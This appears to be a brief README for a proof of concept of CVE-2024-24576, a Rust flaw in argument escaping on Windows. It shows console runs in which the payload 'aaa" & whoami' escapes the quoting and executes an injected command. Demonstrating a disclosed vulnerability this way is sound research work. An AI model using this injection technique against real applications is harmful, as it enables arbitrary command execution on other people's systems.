CVE-2024-24576 PoC

Running the main.rs file with the following payloads give

C:\Users\frost\testing>cargo run
   Compiling testing v0.1.0 (C:\Users\frost\testing)
    Finished dev [unoptimized + debuginfo] target(s) in 0.49s
     Running `target\debug\testing.exe`
enter payload here
aaa
Output:
Argument received: aaa

C:\Users\frost\testing>cargo run
    Finished dev [unoptimized + debuginfo] target(s) in 0.01s
     Running `target\debug\testing.exe`
enter payload here
aaa & whoami
Output:
Argument received: "aaa & whoami"

C:\Users\frost\testing>cargo run
    Finished dev [unoptimized + debuginfo] target(s) in 0.01s
     Running `target\debug\testing.exe`
enter payload here
aaa" & whoami
Output:
Argument received: "aaa\"
desktop-8j2vk8b\frost

Note the escaped argument with the " whoami

NOT MY FINDING! Got information from https://www.bleepingcomputer.com/news/security/critical-rust-flaw-enables-windows-command-injection-attacks/